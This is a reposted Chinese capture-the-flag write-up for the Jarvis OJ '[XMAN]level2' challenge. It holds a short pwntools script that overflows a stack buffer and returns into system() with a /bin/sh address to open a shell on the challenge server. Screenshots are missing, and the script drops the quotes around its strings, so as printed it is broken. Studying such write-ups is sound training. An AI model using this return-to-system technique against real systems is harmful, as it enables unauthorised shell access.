[XMAN]level2

Posted alyx

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[XMAN]level2相关的知识,希望对你有一定的参考价值。

 

技术分享图片

老套路

checksec

技术分享图片

ida查看

技术分享图片

技术分享图片

覆盖掉

之后system地址再返回覆盖 最后/bin/sh地址

# -*- coding:utf-8 -*-

from pwn import *


sh = remote(pwn2.jarvisoj.com, 9878)  # remote


junk = a * 0x88 

fakebp = a*4

sh_address = 0x0804A024  # /bin/sh

sys_address = 0x08048320


payload = junk + fakebp + p32(sys_address)+aaaa+p32(sh_address)

sh.send(payload)

sh.interactive()

 

以上是关于[XMAN]level2的主要内容,如果未能解决你的问题,请参考以下文章

Jarvis OJ - [XMAN]level2 - Writeup

[转]Jarvis OJ- [XMAN]level2/3_x64-Writeup

Jarvis OJ Pwn writeup

Jarvis OJ- [XMAN]level2/3_x64-Writeup——64位简单栈溢出

XMAN-level4

Jarvis OJ - [XMAN]level1 - Writeup——简单shellcode利用